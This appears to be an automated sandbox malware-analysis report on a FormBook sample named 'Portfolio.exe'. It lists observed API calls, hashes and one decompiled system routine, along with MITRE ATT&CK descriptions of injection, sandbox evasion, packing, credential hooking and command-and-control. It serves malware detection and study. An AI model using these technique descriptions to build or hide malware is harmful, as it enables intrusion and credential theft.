PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0303836B

Memory Dump Source

Source File: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: f5c365510cba07ed854a23e5264e361f068e8c0a61aad2f81c96c353a8e4c799
Instruction ID: 7446f90d4db2fd0699aeaa4c8c030f1a4c7527fd9df50a154da57b1dd97edd3e
Opcode Fuzzy Hash: f5c365510cba07ed854a23e5264e361f068e8c0a61aad2f81c96c353a8e4c799
Instruction Fuzzy Hash: 45F0E531B8262436F620A5585C42FFE625CAB83E11F1440A5FF08FD2C0EAC4650A06FA

Uniqueness

Uniqueness Score: -1.00%

Function 030382B4, Relevance: 3.0, APIs: 2, Instructions: 37threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0303834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0303836B

Memory Dump Source

Source File: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 8b586b754a24021404114684736816c8730f9ac0fdf1a1b0679634dfe5e2e3ef
Instruction ID: 91573105ba8e110d6c8d52fdb30076524b52c07d8521a8682326a480b52c59f2
Opcode Fuzzy Hash: 8b586b754a24021404114684736816c8730f9ac0fdf1a1b0679634dfe5e2e3ef
Instruction Fuzzy Hash: 17F0EC367412183AF660DA489C42FBEB75CEFC1F11F24415DFA44F91C0D6A1640D46F2

Uniqueness

Uniqueness Score: -1.00%

Function 0304A241, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0303F1A2,0303F1A2,?,00000000,?,?), ref: 0304A200

Memory Dump Source

Source File: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6bd969f6119a5c72214cf24d8e4333ce4d2af119f44144a840de03358d797078
Instruction ID: 82de8986963986ef8b440ba2d390bc5095f62c985bb3b499df18f9e0e8804a0a
Opcode Fuzzy Hash: 6bd969f6119a5c72214cf24d8e4333ce4d2af119f44144a840de03358d797078
Instruction Fuzzy Hash: 9BF0AFB66412147BE720DFA8DC85EEB37ADDF84A60F05C465FE1C5B251D632EA1087E0

Uniqueness

Uniqueness Score: -1.00%

Function 0303F698, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,03038CF4,?), ref: 0303F6CB

Memory Dump Source

Source File: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 4d2a053d60afd3a1c9713cc183760ac9b54d56c63a34cece4d2c1eb38fffb568
Instruction ID: 7da20b7cb49324763a473f9e40c7b907303419b2d05d5391ed17ddbb048acffb
Opcode Fuzzy Hash: 4d2a053d60afd3a1c9713cc183760ac9b54d56c63a34cece4d2c1eb38fffb568
Instruction Fuzzy Hash: D2F0CD75E8130D3BEB10EB649C41FFA73ACAB85710F0444D4F50C9F191D6B0DA414691

Uniqueness

Uniqueness Score: -1.00%

Function 0304A0DD, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0304A134

Memory Dump Source

Source File: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 78b7c8985b6d5e1b9f0a7db1b15c359f588b4b2545dce6edef9d3f9bdff0881a
Instruction ID: 5cf71c8f12c1b6dca433af2cb5a9ccc783399595956e5b920fd7b6f5142abc34
Opcode Fuzzy Hash: 78b7c8985b6d5e1b9f0a7db1b15c359f588b4b2545dce6edef9d3f9bdff0881a
Instruction Fuzzy Hash: E701E4B2200108BFCB14CF99CC80EEB3BA9AF8C350F158258FA4DE7250C630E841CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0304A0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0304A134

Memory Dump Source

Source File: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 11c1d640169dc44ab61360a0e71d33033c08cb0a132797ed4bb0784b39e14fd8
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: A501AFB2210208BBCB54DF89DC80EEB77ADAF8C754F158258BA0DA7240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0304A1C2, Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0303F1A2,0303F1A2,?,00000000,?,?), ref: 0304A200

Memory Dump Source

Source File: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 9ead6170f509b529300609f5315d47a306214fddd1b0aa9b7e331e4c5a021982
Instruction ID: b1ef4cd85dfb02448b53111819f95bd285b1ef53cc76465c268f7a51fa75b1cf
Opcode Fuzzy Hash: 9ead6170f509b529300609f5315d47a306214fddd1b0aa9b7e331e4c5a021982
Instruction Fuzzy Hash: 33F030F5600205BBDB10EFA5CC81EEB37699F85650F15C568F94997241CA31E8118BB1

Uniqueness

Uniqueness Score: -1.00%

Function 0304A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0303F1A2,0303F1A2,?,00000000,?,?), ref: 0304A200

Memory Dump Source

Source File: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 1d6a395b3e9bfc2d73e5b82486fa325c64998696ca47ec3efa0d8c0819dba966
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: A1E01AB52002086BDB10DF49CC84EE737ADEF88650F018164BA086B241C930E9108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0304A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(03044506,?,03044C7F,03044C7F,?,03044506,?,?,?,?,?,00000000,00000000,?), ref: 0304A05D

Memory Dump Source

Source File: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: d4a19ae5070624e573b1325bed9dc92625e93370aa6890aa77b66dcae78cd092
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 7FE012B5200208ABDB14EF99CC80EA777ACEF88650F118558BA086B241C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0303F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,03038CF4,?), ref: 0303F6CB

Memory Dump Source

Source File: 0000000E.00000002.500122632.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction ID: 2dc53a0f1ca3ddd9e4dea7a6ce5c2e7820c15add407539ba1c416c5a875f2eec
Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction Fuzzy Hash: 66D0A7757903043BE610FAA59C03F6673CD6B45A00F490074FA88DB3C3D950E1004165

Uniqueness

Uniqueness Score: -1.00%

Function 050C967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050C9694

Memory Dump Source

Source File: 0000000E.00000002.501901924.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 0000000E.00000002.503439451.000000000517B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.503468153.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6f1ea0fa6f96383b85d6a676d0c8def434cd2c9b1962f0ebd61cb2ec2d12274e
Instruction ID: c7b0b873eea8eb2ebff3a3449345afc29b3e8d72d39b493e4dbcb53b3154fef0
Opcode Fuzzy Hash: 6f1ea0fa6f96383b85d6a676d0c8def434cd2c9b1962f0ebd61cb2ec2d12274e
Instruction Fuzzy Hash: 17B02B728010C5C5D600D3605608B2F7E0077C0300F12C051E1020244A0338C090F2B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0511FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0511FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E050CCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E05115720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E05115720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0511fdda
0x0511fde2
0x0511fde5
0x0511fdec
0x0511fdfa
0x0511fdff
0x0511fe0a
0x0511fe0f
0x0511fe17
0x0511fe1e
0x0511fe19
0x0511fe19
0x0511fe19
0x0511fe20
0x0511fe21
0x0511fe22
0x0511fe25
0x0511fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0511FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0511FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0511FE2B

Memory Dump Source

Source File: 0000000E.00000002.501901924.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 0000000E.00000002.503439451.000000000517B000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.503468153.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 092a22ceb644a01cc6d6ebdb06d9f5742cde8ca49c162cc3132a5b4cf1c43100
Instruction ID: 537dc1fb17cade140118821b321a2b053954b0a983b54841ecc462e7d8e797c8
Opcode Fuzzy Hash: 092a22ceb644a01cc6d6ebdb06d9f5742cde8ca49c162cc3132a5b4cf1c43100
Instruction Fuzzy Hash: FEF04636600201BFE6201A45DC06F27BF5BEB81730F150364FA284A1D1DB62F86096F8

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Portfolio.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph